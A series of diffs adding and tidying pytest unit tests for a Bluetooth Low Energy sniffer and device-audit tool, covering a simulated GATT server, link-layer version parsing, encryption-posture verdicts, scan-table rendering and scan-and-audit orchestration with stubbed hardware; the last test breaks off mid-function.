 FakeGattDB is a minimal ATT server (ELK-BLEDOM-like layout).
@@ -26,15 +26,15 @@ from conftest import make_att_packet
 
 
 # ---------------------------------------------------------------------------
-# FakeGattDB — minimal ATT server
+# FakeGattDB - minimal ATT server
 # ---------------------------------------------------------------------------
 #
 # Database layout:
-#   Service 0x1800 (Generic Access)  handles 0x0001–0x0005
+#   Service 0x1800 (Generic Access)  handles 0x0001-0x0005
 #     decl 0x0002  char 0x2A00  props=R(0x02)  value_handle=0x0003  value=b"SIMDEV"
-#     (two extra handles 0x0004–0x0005 to fill the service end)
+#     (two extra handles 0x0004-0x0005 to fill the service end)
 #
-#   Service 0xFFF0 (Vendor)          handles 0x0006–0x000f
+#   Service 0xFFF0 (Vendor)          handles 0x0006-0x000f
 #     decl 0x0007  char 0xFFF3  props=W|Wnr(0x0C)  value_handle=0x0008
 #       CCCD 0x2902 @ 0x0009
 #     decl 0x000a  char 0xFFF4  props=N(0x10)  value_handle=0x000b
@@ -89,7 +89,7 @@ class FakeGattDB:
         self._values = {h: v for h, (u, v) in self.ATTRS.items()}
 
     def respond(self, att_req):
-        """Dispatch an ATT request PDU (bytes) → response bytes or None."""
+        """Dispatch an ATT request PDU (bytes) -> response bytes or None."""
         if not att_req:
             return None
         op = att_req[0]
@@ -110,7 +110,7 @@ class FakeGattDB:
             return self._error(op, 0x0000, 0x06)  # Request Not Supported
 
     # ------------------------------------------------------------------
-    # ATT_READ_BY_GROUP_REQ (0x10) → 0x11 or ATT_ERROR
+    # ATT_READ_BY_GROUP_REQ (0x10) -> 0x11 or ATT_ERROR
     # Spec says only type 0x2800 (primary service) is mandatory.
     # ------------------------------------------------------------------
     def _read_by_group(self, req):
@@ -128,7 +128,7 @@ class FakeGattDB:
         return bytes([att.ATT_READ_BY_GROUP_RSP, each]) + data
 
     # ------------------------------------------------------------------
-    # ATT_READ_BY_TYPE_REQ (0x08) → 0x09 or ATT_ERROR
+    # ATT_READ_BY_TYPE_REQ (0x08) -> 0x09 or ATT_ERROR
     # Handles type 0x2803 (Characteristic Declaration).
     # ------------------------------------------------------------------
     def _read_by_type(self, req):
@@ -146,7 +146,7 @@ class FakeGattDB:
         return bytes([att.ATT_READ_BY_TYPE_RSP, each]) + data
 
     # ------------------------------------------------------------------
-    # ATT_FIND_INFO_REQ (0x04) → 0x05 or ATT_ERROR
+    # ATT_FIND_INFO_REQ (0x04) -> 0x05 or ATT_ERROR
     # Returns handle+uuid16 pairs for all attributes in range.
     # ------------------------------------------------------------------
     def _find_info(self, req):
@@ -165,7 +165,7 @@ class FakeGattDB:
         return bytes([att.ATT_FIND_INFO_RSP, 0x01]) + data  # format 1 = uuid16
 
     # ------------------------------------------------------------------
-    # ATT_READ_REQ (0x0A) → 0x0B or ATT_ERROR
+    # ATT_READ_REQ (0x0A) -> 0x0B or ATT_ERROR
     # ------------------------------------------------------------------
     def _read(self, req):
         _, handle = struct.unpack('<BH', req[:3])
@@ -178,7 +178,7 @@ class FakeGattDB:
         return bytes([att.ATT_READ_RSP]) + val
 
     # ------------------------------------------------------------------
-    # ATT_WRITE_REQ (0x12) → 0x13 or ATT_ERROR
+    # ATT_WRITE_REQ (0x12) -> 0x13 or ATT_ERROR
     # ------------------------------------------------------------------
     def _write_req(self, req):
         _, handle = struct.unpack('<BH', req[:3])
@@ -200,7 +200,7 @@ class FakeGattDB:
 
 
 # ---------------------------------------------------------------------------
-# SimHW — simulated Sniffle hardware + peripheral
+# SimHW - simulated Sniffle hardware + peripheral
 # ---------------------------------------------------------------------------
 
 class SimHW:
@@ -258,7 +258,7 @@ class SimHW:
 # ---------------------------------------------------------------------------
 
 def make_session():
-    """Return (hw, link) — a SimHW + live CentralLink."""
+    """Return (hw, link) - a SimHW + live CentralLink."""
     db = FakeGattDB()
     hw = SimHW(db)
     link = connect_session(hw, [0] * 6, is_random=False, timeout=5)

--- a/python_cli/tests/test_ll_version.py
+++ b/python_cli/tests/test_ll_version.py
@@ -1,0 +1,54 @@
+"""
+Unit tests for sniffle.ll_version — parsing the LL_VERSION_IND link-layer
+control PDU and resolving its Bluetooth SIG Company Identifier.
+"""
+
+from sniffle.ll_version import parse_ll_version_ind, LLVersion, LL_VERSION_IND
+
+
+def _version_ind_body(version, company, subver):
+    """Full LL control PDU body: hdr(LLID=3) | length | opcode 0x0C | VersNr |
+    CompId (LE) | SubVersNr (LE)."""
+    payload = bytes([LL_VERSION_IND, version,
+                     company & 0xFF, company >> 8,
+                     subver & 0xFF, subver >> 8])
+    return bytes([0x03, len(payload)]) + payload
+
+
+def test_parse_version_ind_fields():
+    v = parse_ll_version_ind(_version_ind_body(9, 0x000D, 0x1234))
+    assert v is not None
+    assert v.version == 9
+    assert v.company_id == 0x000D
+    assert v.subversion == 0x1234
+
+
+def test_company_name_resolves_via_sig_table():
+    v = parse_ll_version_ind(_version_ind_body(9, 0x000D, 0))
+    assert v.company_name == "Texas Instruments Inc."
+
+
+def test_company_name_unknown_falls_back_to_hex():
+    v = parse_ll_version_ind(_version_ind_body(9, 0xFFFE, 0))
+    assert v.company_name == "0xFFFE"
+
+
+def test_version_name_maps_known_core_versions():
+    assert parse_ll_version_ind(_version_ind_body(9, 0, 0)).version_name == "5.0"
+    assert parse_ll_version_ind(_version_ind_body(12, 0, 0)).version_name == "5.3"
+
+
+def test_parse_returns_none_for_other_opcode():
+    # LL_TERMINATE_IND (0x02) + reason — not a version ind
+    body = bytes([0x03, 0x02, 0x02, 0x13])
+    assert parse_ll_version_ind(body) is None
+
+
+def test_parse_returns_none_when_too_short():
+    body = bytes([0x03, 0x02, LL_VERSION_IND, 0x09])   # truncated payload
+    assert parse_ll_version_ind(body) is None
+
+
+def test_str_includes_company_and_version():
+    s = str(parse_ll_version_ind(_version_ind_body(9, 0x000D, 0)))
+    assert "Texas Instruments" in s and "5.0" in s

--- a/python_cli/tests/test_ll_version.py
+++ b/python_cli/tests/test_ll_version.py
@@ -1,5 +1,5 @@
 """
-Unit tests for sniffle.ll_version — parsing the LL_VERSION_IND link-layer
+Unit tests for sniffle.ll_version - parsing the LL_VERSION_IND link-layer
 control PDU and resolving its Bluetooth SIG Company Identifier.
 """
 
@@ -39,7 +39,7 @@ def test_version_name_maps_known_core_versions():
 
 
 def test_parse_returns_none_for_other_opcode():
-    # LL_TERMINATE_IND (0x02) + reason — not a version ind
+    # LL_TERMINATE_IND (0x02) + reason - not a version ind
     body = bytes([0x03, 0x02, 0x02, 0x13])
     assert parse_ll_version_ind(body) is None
 

--- a/python_cli/tests/test_posture.py
+++ b/python_cli/tests/test_posture.py
@@ -1,0 +1,27 @@
+from sniffle import posture
+
+def test_open_when_only_plaintext_att():
+    p = posture.Posture()
+    p.note_control_opcode(0x0C)  # LL_VERSION_IND
+    p.saw_plaintext_att = True
+    assert p.verdict() == "OPEN"
+
+def test_encrypted_on_ll_enc_req():
+    p = posture.Posture()
+    p.note_control_opcode(0x03)  # LL_ENC_REQ
+    assert p.verdict().startswith("ENCRYPTED")
+
+def test_smp_pairing_justworks_legacy():
+    p = posture.Posture()
+    # SMP Pairing Request: code=0x01, IO=0x03, OOB=0x00, AuthReq=0x01 (bonding, no MITM, no SC)
+    p.note_smp(bytes.fromhex("01030001100000"))  # AuthReq=0x01
+    p.note_control_opcode(0x03)
+    v = p.verdict()
+    assert v == "ENCRYPTED_JUSTWORKS" and p.tag() == "LEGACY"
+
+def test_smp_pairing_mitm_lesc():
+    p = posture.Posture()
+    # AuthReq=0x0D -> bonding(01) + MITM(04) + SC(08)
+    p.note_smp(bytes.fromhex("0104000d100000"))  # AuthReq=0x0D
+    p.note_control_opcode(0x03)
+    assert p.verdict() == "ENCRYPTED_MITM" and p.tag() == "LESC"

--- a/python_cli/tests/test_recon.py
+++ b/python_cli/tests/test_recon.py
@@ -1,0 +1,231 @@
+"""
+Unit tests for sniffle.recon — pure-logic helpers only.
+Hardware-coupled functions (scan, probe) are not tested here.
+"""
+
+from sniffle import recon
+from sniffle.packet_decoder import DPacketMessage
+
+
+def _adv(pdu_type, adva=b"\x66\x55\x44\x33\x22\x11", adv_data=b""):
+    """Build a decoded legacy advertising message of the given PDU type.
+
+    pdu_type: 0=ADV_IND, 2=ADV_NONCONN_IND, 4=SCAN_RSP, 6=ADV_SCAN_IND.
+    Legacy adv decode requires channel >= 37, which PacketMessage.from_body
+    sets by default for non-data packets. *adv_data* is the raw AD payload
+    that AdvaMessage exposes as .adv_data (body[8:]).
+    """
+    body = bytes([pdu_type & 0x0F, 6 + len(adv_data)]) + adva + adv_data
+    return DPacketMessage.from_body(body)
+
+
+# An Apple "Find My" Manufacturer Specific Data AD structure:
+#   len=7, type=0xFF, company=0x004C (LE), msg_type=0x12 (Find My), msg_len=2, data=00 00
+_APPLE_FIND_MY_AD = bytes([0x07, 0xFF, 0x4C, 0x00, 0x12, 0x02, 0x00, 0x00])
+
+
+def test_mac_to_list_roundtrip():
+    """mac_to_list converts 'AA:BB:CC:DD:EE:FF' → little-endian 6-byte list."""
+    assert recon.mac_to_list("AA:BB:CC:DD:EE:FF") == [0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA]
+
+
+def test_mac_to_list_lower_case():
+    """mac_to_list is case-insensitive."""
+    assert recon.mac_to_list("aa:bb:cc:dd:ee:ff") == [0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA]
+
+
+def test_render_scan_table_sorted_and_contains_fields():
+    """render_scan_table sorts strongest-RSSI first within a connectability group
+    and includes the device name and RSSI."""
+    devs = [
+        recon.Device("11:22:33:44:55:66", name="weak", rssi=-80, addr_type="Public"),
+        recon.Device("AA:BB:CC:DD:EE:FF", name="LEDX", rssi=-40, addr_type="Public",
+                     services=[0xFFF0]),
+    ]
+    out = recon.render_scan_table(devs, color=False)
+    # Both connectable (default) → strongest RSSI (-40) must appear before weaker (-80)
+    assert out.index("AA:BB:CC:DD:EE:FF") < out.index("11:22:33:44:55:66")
+    assert "LEDX" in out and "-40" in out
+
+
+def test_parse_adv_data_name_and_services():
+    """parse_adv_data extracts device name and 16-bit service UUIDs from raw AD bytes."""
+    # Build a minimal AD payload:
+    #   AD[0x09] Complete Local Name = "Test"
+    #   AD[0x03] Complete List of 16-bit UUIDs = [0x1800, 0x180A]
+    name_bytes = b"Test"
+    name_ad = bytes([len(name_bytes) + 1, 0x09]) + name_bytes
+    uuids_raw = b"\x00\x18\x0A\x18"   # 0x1800, 0x180A in little-endian
+    uuids_ad = bytes([len(uuids_raw) + 1, 0x03]) + uuids_raw
+    payload = name_ad + uuids_ad
+
+    name, services = recon.parse_adv_data(payload)
+    assert name == "Test"
+    assert 0x1800 in services and 0x180A in services
+
+
+def test_parse_adv_data_shortened_name_no_services():
+    """parse_adv_data returns shortened name (0x08) when complete name absent, empty services."""
+    name_bytes = b"Sh"
+    name_ad = bytes([len(name_bytes) + 1, 0x08]) + name_bytes
+    name, services = recon.parse_adv_data(name_ad)
+    assert name == "Sh"
+    assert services == []
+
+
+def test_render_scan_table_header_and_legend():
+    """render_scan_table includes a header row (with the Conn column) and a legend."""
+    devs = [recon.Device("AA:BB:CC:DD:EE:FF", rssi=-55)]
+    out = recon.render_scan_table(devs, color=False)
+    # Header should contain column labels, including the new connectability column
+    assert "MAC" in out
+    assert "RSSI" in out
+    assert "Conn" in out
+    # Legend should explain connectability
+    assert "connectable" in out.lower()
+
+
+# ---------------------------------------------------------------------------
+# Connectability classification (the audit-on-discovery bug fix)
+# ---------------------------------------------------------------------------
+
+def test_ingest_skips_all_zero_mac():
+    """A malformed advert with an all-zero address is dropped, not listed."""
+    seen, best = {}, {}
+    recon._ingest_into(_adv(0, adva=b"\x00\x00\x00\x00\x00\x00"), seen, best)
+    assert seen == {}
+
+
+def test_ingest_marks_adv_ind_connectable():
+    """ADV_IND advertisers are recorded as connectable."""
+    seen, best = {}, {}
+    recon._ingest_into(_adv(0), seen, best)
+    dev = next(iter(seen.values()))
+    assert dev.connectable is True
+
+
+def test_ingest_marks_nonconn_ind_not_connectable():
+    """ADV_NONCONN_IND beacons are recorded as NOT connectable."""
+    seen, best = {}, {}
+    recon._ingest_into(_adv(2), seen, best)
+    dev = next(iter(seen.values()))
+    assert dev.connectable is False
+
+
+def test_ingest_marks_scan_ind_not_connectable():
+    """ADV_SCAN_IND (scannable but not connectable) is recorded as NOT connectable."""
+    seen, best = {}, {}
+    recon._ingest_into(_adv(6), seen, best)
+    dev = next(iter(seen.values()))
+    assert dev.connectable is False
+
+
+def test_ingest_connectable_is_sticky_across_packets():
+    """Seeing a non-connectable SCAN_RSP first, then an ADV_IND for the same MAC,
+    leaves the device marked connectable (the flag never downgrades)."""
+    seen, best = {}, {}
+    recon._ingest_into(_adv(4), seen, best)   # SCAN_RSP — not connectable by itself
+    recon._ingest_into(_adv(0), seen, best)   # ADV_IND — same MAC, connectable
+    assert len(seen) == 1
+    dev = next(iter(seen.values()))
+    assert dev.connectable is True
+
+
+# ---------------------------------------------------------------------------
+# Vendor / device-type label from Manufacturer Specific Data
+# ---------------------------------------------------------------------------
+
+def test_vendor_apple_find_my():
+    """Apple Continuity MSD resolves to an 'Apple …' label with the message type."""
+    label = recon.vendor_from_adv_data(_APPLE_FIND_MY_AD)
+    assert label.startswith("Apple")
+    assert "Find My" in label
+
+
+def test_vendor_generic_company_resolves_name():
+    """A non-Apple/MS company id resolves via the company_identifiers table."""
+    from sniffle.advdata.constants import company_identifiers
+    cid = 0x0075  # Samsung — generic ManufacturerSpecificDataRecord path
+    data = bytes([0x05, 0xFF, cid & 0xFF, cid >> 8, 0xAA, 0xBB])
+    assert recon.vendor_from_adv_data(data) == company_identifiers.get(cid, "0x%04X" % cid)
+
+
+def test_vendor_unknown_company_falls_back_to_hex():
+    data = bytes([0x05, 0xFF, 0xFF, 0xFF, 0xAA, 0xBB])
+    assert recon.vendor_from_adv_data(data) == "0xFFFF"
+
+
+def test_vendor_empty_when_no_msd():
+    """A name-only advertisement has no vendor label."""
+    name_ad = bytes([0x05, 0x09]) + b"Test"
+    assert recon.vendor_from_adv_data(name_ad) == ""
+
+
+def test_ingest_populates_vendor_from_msd():
+    """_ingest_into derives the vendor label from the advertisement's MSD."""
+    seen, best = {}, {}
+    recon._ingest_into(_adv(0, adv_data=_APPLE_FIND_MY_AD), seen, best)
+    dev = next(iter(seen.values()))
+    assert dev.vendor.startswith("Apple")
+
+
+# ---------------------------------------------------------------------------
+# Conn column, Name/Vendor fallback, and --connectable-only filtering
+# ---------------------------------------------------------------------------
+
+def test_render_table_shows_connectable_flag():
+    """The Conn column shows Y for connectable and N for non-connectable devices."""
+    devs = [
+        recon.Device("AA:BB:CC:DD:EE:FF", name="LEDX", rssi=-40, connectable=True),
+        recon.Device("11:22:33:44:55:66", rssi=-50, connectable=False),
+    ]
+    out = recon.render_scan_table(devs, color=False)
+    lines = out.splitlines()
+    yes_line = next(l for l in lines if "AA:BB:CC:DD:EE:FF" in l)
+    no_line = next(l for l in lines if "11:22:33:44:55:66" in l)
+    assert "Y" in yes_line.split()
+    assert "N" in no_line.split()
+
+
+def test_render_table_has_separate_name_and_vendor_columns():
+    """Name and Vendor are distinct columns — both values appear on the row."""
+    devs = [recon.Device("AA:BB:CC:DD:EE:FF", name="MyGadget",
+                         vendor="Apple Find My", rssi=-40, connectable=True)]
+    out = recon.render_scan_table(devs, color=False)
+    header = out.splitlines()[0]
+    assert "Name" in header and "Vendor" in header
+    row = next(l for l in out.splitlines() if "AA:BB:CC:DD:EE:FF" in l)
+    assert "MyGadget" in row and "Apple Find My" in row
+
+
+def test_render_table_vendor_shown_when_no_name():
+    """A nameless beacon still shows its vendor in the Vendor column."""
+    devs = [recon.Device("AA:BB:CC:DD:EE:FF", name="", vendor="Apple Find My", rssi=-40)]
+    out = recon.render_scan_table(devs, color=False)
+    assert "Apple Find My" in out
+
+
+def test_render_table_bold_connectable_dim_nonconnectable():
+    """Connectable rows are bold (easy to spot); non-connectable beacons are dim.
+    This is the visual split that makes the list scannable."""
+    devs = [
+        recon.Device("AA:BB:CC:DD:EE:FF", rssi=-40, connectable=True),
+        recon.Device("11:22:33:44:55:66", rssi=-50, connectable=False),
+    ]
+    out = recon.render_scan_table(devs, color=True)
+    lines = out.splitlines()
+    conn_line = next(l for l in lines if "AA:BB:CC:DD:EE:FF" in l)
+    noconn_line = next(l for l in lines if "11:22:33:44:55:66" in l)
+    assert "\x1b[1m" in conn_line        # connectable -> bold
+    assert "\x1b[2m" in noconn_line      # non-connectable -> dim
+
+
+def test_render_table_sorts_connectable_first():
+    """Connectable devices are grouped above non-connectable ones, even when a
+    beacon has a stronger signal."""
+    devs = [
+        recon.Device("11:11:11:11:11:11", rssi=-30, connectable=False),  # loud beacon
+        recon.Device("22:22:22:22:22:22", rssi=-80, connectable=True),   # weak, connectable
+    ]
+    out = recon.render_scan_table(devs, color=False)
+    assert out.index("22:22:22:22:22:22") < out.index("11:11:11:11:11:11")

--- a/python_cli/tests/test_recon.py
+++ b/python_cli/tests/test_recon.py
@@ -1,5 +1,5 @@
 """
-Unit tests for sniffle.recon — pure-logic helpers only.
+Unit tests for sniffle.recon - pure-logic helpers only.
 Hardware-coupled functions (scan, probe) are not tested here.
 """
 
@@ -25,7 +25,7 @@ _APPLE_FIND_MY_AD = bytes([0x07, 0xFF, 0x4C, 0x00, 0x12, 0x02, 0x00, 0x00])
 
 
 def test_mac_to_list_roundtrip():
-    """mac_to_list converts 'AA:BB:CC:DD:EE:FF' → little-endian 6-byte list."""
+    """mac_to_list converts 'AA:BB:CC:DD:EE:FF' -> little-endian 6-byte list."""
     assert recon.mac_to_list("AA:BB:CC:DD:EE:FF") == [0xFF, 0xEE, 0xDD, 0xCC, 0xBB, 0xAA]
 
 
@@ -43,7 +43,7 @@ def test_render_scan_table_sorted_and_contains_fields():
                      services=[0xFFF0]),
     ]
     out = recon.render_scan_table(devs, color=False)
-    # Both connectable (default) → strongest RSSI (-40) must appear before weaker (-80)
+    # Both connectable (default) -> strongest RSSI (-40) must appear before weaker (-80)
     assert out.index("AA:BB:CC:DD:EE:FF") < out.index("11:22:33:44:55:66")
     assert "LEDX" in out and "-40" in out
 
@@ -124,8 +124,8 @@ def test_ingest_connectable_is_sticky_across_packets():
     """Seeing a non-connectable SCAN_RSP first, then an ADV_IND for the same MAC,
     leaves the device marked connectable (the flag never downgrades)."""
     seen, best = {}, {}
-    recon._ingest_into(_adv(4), seen, best)   # SCAN_RSP — not connectable by itself
-    recon._ingest_into(_adv(0), seen, best)   # ADV_IND — same MAC, connectable
+    recon._ingest_into(_adv(4), seen, best)   # SCAN_RSP - not connectable by itself
+    recon._ingest_into(_adv(0), seen, best)   # ADV_IND - same MAC, connectable
     assert len(seen) == 1
     dev = next(iter(seen.values()))
     assert dev.connectable is True
@@ -136,7 +136,7 @@ def test_ingest_connectable_is_sticky_across_packets():
 # ---------------------------------------------------------------------------
 
 def test_vendor_apple_find_my():
-    """Apple Continuity MSD resolves to an 'Apple …' label with the message type."""
+    """Apple Continuity MSD resolves to an 'Apple ...' label with the message type."""
     label = recon.vendor_from_adv_data(_APPLE_FIND_MY_AD)
     assert label.startswith("Apple")
     assert "Find My" in label
@@ -145,7 +145,7 @@ def test_vendor_apple_find_my():
 def test_vendor_generic_company_resolves_name():
     """A non-Apple/MS company id resolves via the company_identifiers table."""
     from sniffle.advdata.constants import company_identifiers
-    cid = 0x0075  # Samsung — generic ManufacturerSpecificDataRecord path
+    cid = 0x0075  # Samsung - generic ManufacturerSpecificDataRecord path
     data = bytes([0x05, 0xFF, cid & 0xFF, cid >> 8, 0xAA, 0xBB])
     assert recon.vendor_from_adv_data(data) == company_identifiers.get(cid, "0x%04X" % cid)
 
@@ -188,7 +188,7 @@ def test_render_table_shows_connectable_flag():
 
 
 def test_render_table_has_separate_name_and_vendor_columns():
-    """Name and Vendor are distinct columns — both values appear on the row."""
+    """Name and Vendor are distinct columns - both values appear on the row."""
     devs = [recon.Device("AA:BB:CC:DD:EE:FF", name="MyGadget",
                          vendor="Apple Find My", rssi=-40, connectable=True)]
     out = recon.render_scan_table(devs, color=False)

--- a/python_cli/tests/test_repl_hex.py
+++ b/python_cli/tests/test_repl_hex.py
@@ -1,4 +1,4 @@
-"""Unit tests for bluecat._hexbytes — pasting sniffed bytes into the REPL."""
+"""Unit tests for bluecat._hexbytes - pasting sniffed bytes into the REPL."""
 import bluecat
 
 def test_space_separated_hex():

--- a/python_cli/tests/test_repl_hex.py
+++ b/python_cli/tests/test_repl_hex.py
@@ -1,0 +1,15 @@
+"""Unit tests for bluecat._hexbytes — pasting sniffed bytes into the REPL."""
+import bluecat
+
+def test_space_separated_hex():
+    assert bluecat._hexbytes(["7e","07","05","03","f6","00","ff","10","ef"]) \
+        == bytes.fromhex("7e070503f600ff10ef")
+
+def test_colon_separated_hex():
+    assert bluecat._hexbytes(["7e:07:05"]) == bytes.fromhex("7e0705")
+
+def test_single_blob():
+    assert bluecat._hexbytes(["7e070503"]) == bytes.fromhex("7e070503")
+
+def test_empty():
+    assert bluecat._hexbytes([]) == b""

--- a/python_cli/tests/test_scan_audit.py
+++ b/python_cli/tests/test_scan_audit.py
@@ -1,5 +1,5 @@
 """
-test_scan_audit.py — unit tests for recon.scan_and_audit orchestration.
+test_scan_audit.py - unit tests for recon.scan_and_audit orchestration.
 
 No real hardware is used. Both _scan_channel and audit.audit_device are
 monkeypatched to return canned data so the tests exercise only the

--- a/python_cli/tests/test_scan_audit.py
+++ b/python_cli/tests/test_scan_audit.py
@@ -1,0 +1,279 @@
+"""
+test_scan_audit.py — unit tests for recon.scan_and_audit orchestration.
+
+No real hardware is used. Both _scan_channel and audit.audit_device are
+monkeypatched to return canned data so the tests exercise only the
+orchestration logic inside scan_and_audit.
+"""
+
+import pytest
+from sniffle.recon import Device, scan_and_audit
+from sniffle.audit import Finding, HIGH, INFO
+
+
+# ---------------------------------------------------------------------------
+# Fixture: canned devices
+# ---------------------------------------------------------------------------
+
+@pytest.fixture
+def dev_a():
+    return Device(mac="AA:BB:CC:DD:EE:FF", addr_type="Public", name="DevA", rssi=-50)
+
+
+@pytest.fixture
+def dev_b():
+    return Device(mac="BB:CC:DD:EE:FF:00", addr_type="RPA", name="DevB", rssi=-60)
+
+
+@pytest.fixture
+def dev_c():
+    return Device(mac="CC:DD:EE:FF:00:11", addr_type="Static", name="DevC", rssi=-70)
+
+
+@pytest.fixture
+def canned_finding():
+    return Finding(HIGH, "no-encryption", "GATT readable without encryption", "")
+
+
+# ---------------------------------------------------------------------------
+# Helper: build a fake _scan_channel that returns pre-canned results per call.
+# calls[i] -> list of Device returned on the i-th invocation.
+# ---------------------------------------------------------------------------
+
+def make_scan_channel_stub(*per_call_lists):
+    """Return a replacement for recon._scan_channel.
+
+    On the n-th call it pops and returns per_call_lists[n].
+    Also populates the *seen* dict so scan_and_audit's dedup works correctly.
+    """
+    call_iter = iter(per_call_lists)
+
+    def _stub(hw, ch, duration, seen, best_rssi):
+        try:
+            new_devs = list(next(call_iter))
+        except StopIteration:
+            new_devs = []
+        result = []
+        for dev in new_devs:
+            if dev.mac not in seen:
+                seen[dev.mac] = dev
+                best_rssi[dev.mac] = dev.rssi
+                result.append(dev)
+            # if already in seen (dup across channels) don't add to result
+        return result
+
+    return _stub
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+class TestScanAndAuditOrchestration:
+
+    def test_all_three_channels_audited_once_each(
+            self, monkeypatch, dev_a, dev_b, dev_c, canned_finding):
+        """Devices discovered on channels 37/38/39 are each audited exactly once."""
+        audited_macs = []
+
+        # ch37 -> [A, B], ch38 -> [A again (dup), C], ch39 -> []
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([dev_a, dev_b], [dev_a, dev_c], []),
+        )
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: (audited_macs.append(dev.mac), [canned_finding])[1],
+        )
+
+        results = scan_and_audit(hw=None)
+
+        assert len(results) == 3, "Expected 3 unique devices audited, got %d" % len(results)
+        assert sorted(audited_macs) == sorted([dev_a.mac, dev_b.mac, dev_c.mac])
+
+    def test_duplicate_not_re_audited(
+            self, monkeypatch, dev_a, dev_b, canned_finding):
+        """A device seen on multiple channels is audited only once."""
+        audit_call_count = {"n": 0}
+
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([dev_a, dev_b], [dev_a], [dev_a]),
+        )
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: (
+                audit_call_count.__setitem__("n", audit_call_count["n"] + 1),
+                [canned_finding],
+            )[1],
+        )
+
+        results = scan_and_audit(hw=None)
+
+        assert audit_call_count["n"] == 2, (
+            "Expected 2 audits (A once, B once); got %d" % audit_call_count["n"])
+        assert len(results) == 2
+
+    def test_rpa_audited_when_include_private_true(
+            self, monkeypatch, dev_b, canned_finding):
+        """RPA device IS audited when include_private=True (default)."""
+        audited_macs = []
+
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([dev_b], [], []),
+        )
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: (audited_macs.append(dev.mac), [canned_finding])[1],
+        )
+
+        results = scan_and_audit(hw=None, include_private=True)
+
+        assert dev_b.mac in audited_macs, "RPA device should be audited with include_private=True"
+        assert len(results) == 1
+
+    def test_rpa_skipped_when_include_private_false(
+            self, monkeypatch, dev_a, dev_b, dev_c, canned_finding):
+        """RPA device is SKIPPED and Public/Static ARE audited when include_private=False."""
+        audited_macs = []
+
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([dev_a, dev_b], [dev_c], []),
+        )
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: (audited_macs.append(dev.mac), [canned_finding])[1],
+        )
+
+        results = scan_and_audit(hw=None, include_private=False)
+
+        assert dev_b.mac not in audited_macs, "RPA device should be skipped when include_private=False"
+        assert dev_a.mac in audited_macs, "Public device should be audited"
+        assert dev_c.mac in audited_macs, "Static device should be audited"
+        assert len(results) == 2
+
+    def test_on_discover_callback_called(
+            self, monkeypatch, dev_a, dev_b, canned_finding):
+        """on_discover callback is called for each newly discovered device."""
+        discovered = []
+
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([dev_a], [dev_b], []),
+        )
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: [canned_finding],
+        )
+
+        scan_and_audit(hw=None, on_discover=lambda d: discovered.append(d.mac))
+
+        assert sorted(discovered) == sorted([dev_a.mac, dev_b.mac])
+
+    def test_on_result_callback_called(
+            self, monkeypatch, dev_a, canned_finding):
+        """on_result callback is called after auditing each device."""
+        results_cb = []
+
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([dev_a], [], []),
+        )
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: [canned_finding],
+        )
+
+        scan_and_audit(
+            hw=None,
+            on_result=lambda d, f: results_cb.append((d.mac, f)),
+        )
+
+        assert len(results_cb) == 1
+        mac, findings = results_cb[0]
+        assert mac == dev_a.mac
+        assert findings == [canned_finding]
+
+    def test_return_value_structure(
+            self, monkeypatch, dev_a, dev_c, canned_finding):
+        """scan_and_audit returns list of (Device, findings) tuples."""
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([dev_a, dev_c], [], []),
+        )
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: [canned_finding],
+        )
+
+        results = scan_and_audit(hw=None)
+
+        assert isinstance(results, list)
+        for item in results:
+            assert isinstance(item, tuple) and len(item) == 2
+            device, findings = item
+            assert isinstance(device, Device)
+            assert isinstance(findings, list)
+
+    def test_single_channel_mode(
+            self, monkeypatch, dev_a, canned_finding):
+        """When advchan is specified only that channel is scanned."""
+        scan_calls = []
+
+        def _stub(hw, ch, duration, seen, best_rssi):
+            scan_calls.append(ch)
+            if ch == 38:
+                seen[dev_a.mac] = dev_a
+                best_rssi[dev_a.mac] = dev_a.rssi
+                return [dev_a]
+            return []
+
+        monkeypatch.setattr("sniffle.recon._scan_channel", _stub)
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: [canned_finding],
+        )
+
+        results = scan_and_audit(hw=None, advchan=38)
+
+        assert scan_calls == [38], "Only channel 38 should be scanned; got: %s" % scan_calls
+        assert len(results) == 1
+
+    def test_empty_scan_returns_empty_results(self, monkeypatch):
+        """If no devices are found, scan_and_audit returns an empty list."""
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([], [], []),
+        )
+        # audit_device should never be called
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: (_ for _ in ()).throw(
+                AssertionError("audit_device should not be called when no devices found")
+            ),
+        )
+
+        results = scan_and_audit(hw=None)
+        assert results == []
+
+    def test_nrpa_skipped_when_include_private_false(
+            self, monkeypatch, canned_finding):
+        """NRPA device is also skipped when include_private=False."""
+        dev_nrpa = Device(mac="DD:EE:FF:00:11:22", addr_type="NRPA", name="nrpa", rssi=-55)
+        audited_macs = []
+
+        monkeypatch.setattr(
+            "sniffle.recon._scan_channel",
+            make_scan_channel_stub([dev_nrpa], [], []),
+        )
+        monkeypatch.setattr(
+            "sniffle.audit.audit_device",
+            lambda hw, dev, aggressive=False: (audited_macs.append(dev.mac), [canned_finding])[1],
+        )
+
